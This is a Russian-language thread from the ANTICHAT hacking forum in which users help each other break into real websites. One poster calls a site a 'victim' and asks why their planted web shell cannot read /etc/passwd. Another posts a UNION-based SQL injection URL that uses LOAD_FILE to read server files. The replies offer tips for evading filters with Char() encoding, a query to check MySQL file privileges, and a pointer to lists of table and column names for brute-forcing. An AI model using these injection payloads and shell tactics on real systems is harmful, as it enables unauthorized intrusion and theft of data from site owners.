ANTICHAT — форум по информационной безопасности, OSINT и технологиям

Так что с этим ничего нельзя сделать ?

почитай http://www.xakep.ru/magazine/xA/086/060/1.asp

Ничего полезного там нет

почему шелл при попытке открыть etc/passwd или прочитать другой каталог выше самого сайты выдает ошибку HTTP Ошибка 406 - Не приемлемо
safe_mode 0, open_basedir no value

Жертва находится на Masterhost.

1) нашёл инъекцию, пытаюсь прочитать файл, например так:
http://SITE_NAME.com/cgi-bin/library/com/perl/controller.cgi?action=get&uid='+union+select+1,2,3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,LOAD_FILE('/home/u53608/SITE_NAME.com/www/english/index.html'),30,'31

Запрос срабатывает, но содержимое файла index.html не показывается. Можно ли узнать, есть ли у пользователя MySQL права на чтение и создание файлов? Или я просто неверно указываю путь к файлу.


2) может быть кто уже знает, есть ли у пользователя MySQL права на чтение и создание файлов?

1)Попробуй перевести запрос в Char()
2)Не всегда

saynt2day
select file_priv from mysql.user where username='user'
где user - имя пользователя от которого работает мускуль
узнать через функцию user()

__________________
God forgive me for I have sinned
It’s been six months since my last confession
There is nowhere that I can run to
My soul I place in your hands

Уже запарился пользоваться поиском - нифига не выводит по теме.
Где-то была темка в которой выкладывали список часто-юзаемых имен таблиц и столбцов для брутфорса. Подскажите ее, плиз?

_https://forum.antichat.ru/thread45790.html